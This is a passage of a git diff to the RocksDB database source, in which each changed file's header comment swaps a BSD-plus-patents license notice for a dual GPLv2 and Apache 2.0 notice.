-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
diff --git a/db/repair.cc b/db/repair.cc
index 58668bf4199..c248e6f43c4 100644
--- a/db/repair.cc
+++ b/db/repair.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/repair_test.cc b/db/repair_test.cc
index d713b3382a4..226e4e6d063 100644
--- a/db/repair_test.cc
+++ b/db/repair_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/db/snapshot_impl.cc b/db/snapshot_impl.cc
index bc29243bd53..032ef398aa5 100644
--- a/db/snapshot_impl.cc
+++ b/db/snapshot_impl.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
#include "rocksdb/snapshot.h" diff --git a/db/snapshot_impl.h b/db/snapshot_impl.h index 0f804300e8f..b94602f2ae5 100644 --- a/db/snapshot_impl.h +++ b/db/snapshot_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/table_cache.cc b/db/table_cache.cc index 8aaaf975590..398556a08f9 100644 --- a/db/table_cache.cc +++ b/db/table_cache.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/table_cache.h b/db/table_cache.h index 85adba510a5..8b65bafa3ef 100644 --- a/db/table_cache.h +++ b/db/table_cache.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/table_properties_collector.cc b/db/table_properties_collector.cc index ebbc6c44835..a1f4dba97bb 100644 --- a/db/table_properties_collector.cc +++ b/db/table_properties_collector.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/table_properties_collector.h" diff --git a/db/table_properties_collector.h b/db/table_properties_collector.h index fd155634847..d8cd75689d5 100644 --- a/db/table_properties_collector.h +++ b/db/table_properties_collector.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file defines a collection of statistics collectors. #pragma once diff --git a/db/table_properties_collector_test.cc b/db/table_properties_collector_test.cc index 2c9f1d92c24..66c66c02531 100644 --- a/db/table_properties_collector_test.cc +++ b/db/table_properties_collector_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/db/transaction_log_impl.cc b/db/transaction_log_impl.cc index 5753a65f443..e22c0c4af05 100644 --- a/db/transaction_log_impl.cc +++ b/db/transaction_log_impl.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #ifndef __STDC_FORMAT_MACROS diff --git a/db/transaction_log_impl.h b/db/transaction_log_impl.h index 11b692415c9..769d8339bd9 100644 --- a/db/transaction_log_impl.h +++ b/db/transaction_log_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/db/version_builder.cc b/db/version_builder.cc index 273708280e1..bab8d11f5a5 100644 --- a/db/version_builder.cc +++ b/db/version_builder.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_builder.h b/db/version_builder.h index 42c7064c956..235f79d7f5d 100644 --- a/db/version_builder.h +++ b/db/version_builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_builder_test.cc b/db/version_builder_test.cc index 28ea3fd957d..304df2a0455 100644 --- a/db/version_builder_test.cc +++ b/db/version_builder_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include "db/version_edit.h" diff --git a/db/version_edit.cc b/db/version_edit.cc index ef2ed49fedf..b01f7bbdf70 100644 --- a/db/version_edit.cc +++ b/db/version_edit.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. 
+// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_edit.h b/db/version_edit.h index 72b0522773a..47ebf5b1c76 100644 --- a/db/version_edit.h +++ b/db/version_edit.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_edit_test.cc b/db/version_edit_test.cc index 329dd4da1a1..338bb36f605 100644 --- a/db/version_edit_test.cc +++ b/db/version_edit_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_set.cc b/db/version_set.cc index 849c3cc6306..0069d86c1dd 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_set.h b/db/version_set.h index 17627a4b1d4..5a1f8d07d64 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. 
An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/version_set_test.cc b/db/version_set_test.cc index c8c8541f702..625d4592264 100644 --- a/db/version_set_test.cc +++ b/db/version_set_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/wal_manager.cc b/db/wal_manager.cc index 1ccf153e8c0..7ee2dd0176e 100644 --- a/db/wal_manager.cc +++ b/db/wal_manager.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/wal_manager.h b/db/wal_manager.h index 5339f1c0341..aa62d793bc7 100644 --- a/db/wal_manager.h +++ b/db/wal_manager.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. 
// Use of this source code is governed by a BSD-style license that can be diff --git a/db/wal_manager_test.cc b/db/wal_manager_test.cc index f381311062b..9f5cf273d24 100644 --- a/db/wal_manager_test.cc +++ b/db/wal_manager_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/write_batch.cc b/db/write_batch.cc index 8ecf5794fcf..91be9a0dfa6 100644 --- a/db/write_batch.cc +++ b/db/write_batch.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/write_batch_base.cc b/db/write_batch_base.cc index d53b07bda32..5522c1ff77f 100644 --- a/db/write_batch_base.cc +++ b/db/write_batch_base.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/write_batch_base.h" diff --git a/db/write_batch_internal.h b/db/write_batch_internal.h index a8ca6096ca7..48a417ce877 100644 --- a/db/write_batch_internal.h +++ b/db/write_batch_internal.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. 
// Use of this source code is governed by a BSD-style license that can be diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 511fec154bf..388155b6384 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/db/write_callback.h b/db/write_callback.h index 93c80d65103..6517a7c3aa1 100644 --- a/db/write_callback.h +++ b/db/write_callback.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/db/write_callback_test.cc b/db/write_callback_test.cc index 18727ee6a7f..9edf1c1581e 100644 --- a/db/write_callback_test.cc +++ b/db/write_callback_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/db/write_controller.cc b/db/write_controller.cc index 699044ec20a..558aa721923 100644 --- a/db/write_controller.cc +++ b/db/write_controller.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). 
#include "db/write_controller.h" diff --git a/db/write_controller.h b/db/write_controller.h index c344a74d890..7c301ce7d27 100644 --- a/db/write_controller.h +++ b/db/write_controller.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/db/write_controller_test.cc b/db/write_controller_test.cc index 1b97d622204..a1fe3fa27ea 100644 --- a/db/write_controller_test.cc +++ b/db/write_controller_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include diff --git a/db/write_thread.cc b/db/write_thread.cc index 0938ad28cb1..022f4e64695 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "db/write_thread.h" #include diff --git a/db/write_thread.h b/db/write_thread.h index c72c95a1185..51bb97f2a8d 100644 --- a/db/write_thread.h +++ b/db/write_thread.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/env/env.cc b/env/env.cc index 8e1d78bfe8b..ae0b111be86 100644 --- a/env/env.cc +++ b/env/env.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. 
-// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/env_chroot.cc b/env/env_chroot.cc index 08b5be65e9e..6a1fda8a834 100644 --- a/env/env_chroot.cc +++ b/env/env_chroot.cc @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #if !defined(ROCKSDB_LITE) && !defined(OS_WIN) diff --git a/env/env_chroot.h b/env/env_chroot.h index 8e513f3b750..b2760bc0a3c 100644 --- a/env/env_chroot.h +++ b/env/env_chroot.h @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/env/env_encryption.cc b/env/env_encryption.cc index 9c9fcd3fcf6..6b688a66020 100644 --- a/env/env_encryption.cc +++ b/env/env_encryption.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/env/env_hdfs.cc b/env/env_hdfs.cc index c0b82b5db4d..d98020c76b3 100644 --- a/env/env_hdfs.cc +++ b/env/env_hdfs.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. 
An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #include "rocksdb/env.h" diff --git a/env/env_posix.cc b/env/env_posix.cc index 46fd453bf18..7f2bc3b85dd 100644 --- a/env/env_posix.cc +++ b/env/env_posix.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/env_test.cc b/env/env_test.cc index 4f9028192a9..7fd71a3c430 100644 --- a/env/env_test.cc +++ b/env/env_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/io_posix.cc b/env/io_posix.cc index b6364eb97ec..c5b14d3effe 100644 --- a/env/io_posix.cc +++ b/env/io_posix.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/io_posix.h b/env/io_posix.h index 7d1fc074fd6..69c98438f27 100644 --- a/env/io_posix.h +++ b/env/io_posix.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. 
An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/mock_env.cc b/env/mock_env.cc index 16cd0a66c2e..79a4f8c44a6 100644 --- a/env/mock_env.cc +++ b/env/mock_env.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/env/mock_env.h b/env/mock_env.h index d116c3a6a79..ba1e5fa31e7 100644 --- a/env/mock_env.h +++ b/env/mock_env.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found 